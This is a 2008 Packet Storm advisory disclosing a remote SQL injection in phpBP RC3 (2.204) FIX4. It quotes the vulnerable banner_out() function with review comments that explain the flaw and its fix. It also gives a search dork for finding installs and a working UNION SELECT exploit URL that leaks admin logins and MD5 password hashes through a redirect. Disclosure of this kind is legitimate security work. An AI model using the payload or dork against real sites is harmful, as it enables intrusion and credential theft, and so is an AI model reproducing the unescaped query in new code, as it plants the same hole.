phpbp-sql.txt

2008-03-17T00:00:00
ID PACKETSTORM:64612
Type packetstorm
Reporter irk4z
Modified 2008-03-17T00:00:00

Description

                                        
                                            `.-----------------------------------------------------------------------------.  
| vuln.: phpBP <= RC3 (2.204) FIX4 Remote SQL Injection Vulnerability |  
| download: http://www.phpbp.com/ |  
| dork: "PHP BP Team" |  
| |  
| author: irk4z@yahoo.pl |  
| homepage: http://irk4z.wordpress.com/ |  
| |  
| ---> HACKBOX.pl <--- |  
| |  
| greets to: cOndemned, str0ke, wacky |  
'-----------------------------------------------------------------------------'  
  
# code:  
  
./includes/functions/banners-external.php:  
...  
// banner_out(): selects the banner row matching the request's `id`, increments that
// row's `views` counter, and redirects the client to the row's `url`.
// This is the excerpt quoted by the advisory; the leading numbers appear to be the
// line numbers of the function inside banners-external.php.
3 function banner_out() // counts the number of clicks on a banner  
4 {  
5 global $conf;  
6   
7 if($_GET['id'])  
8 {  
// NOTE(review): the value passed to SQLvalidate() is $_POST['id'], but both queries
// below read $_GET['id'], so whatever SQLvalidate() checks never applies to the value
// that actually reaches the SQL text.
9 SQLvalidate($_POST['id']);  
10  
11 $db = new dbquery;  
// $_GET['id'] is interpolated here unquoted and with no escaping in this function, so
// the request controls the statement text; this is the injection point the advisory
// reports. The usual remedy is to cast the id to an integer or bind it as a parameter
// (dbquery's API is not shown in this excerpt).
12 $db->query("SELECT * FROM $conf[prefix]banners WHERE id=$_GET[id]") or $db->err(__FILE__, __LINE__);   
13   
14 if($db->num_rows()==0)  
15 {  
// NOTE(review): the target contains a second '?' where '&' was probably intended — confirm.
16 redirect('index.php?module=error?error=banners_error2');  
17 exit;  
18 }   
19   
20 $d=$db->fetch_object();  
// The same request value is reused; the surrounding quotes are not a substitute for
// escaping or parameter binding.
21 $db->query("UPDATE $conf[prefix]banners SET views=views+1 WHERE id='$_GET[id]'") or $db->err(__FILE__, __LINE__);   
22   
// The redirect target is the `url` field of the row fetched from the SELECT above, so
// anything that alters that result set also decides where the client is sent.
23 redirect($d->url);  
24 }  
25  
// Reached whether or not an id was supplied: the function always ends the request.
26 exit;  
27 }  
...  
  
# exploit:  
  
http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*  
  
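You will be redirected to http://[login]_[md5_hash_pass] (e.g. http://admin_21232f297a57a5a743894a0e4a801fc3/), because banner_out() passes the url field of the row returned by the SELECT straight to redirect().  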
  
`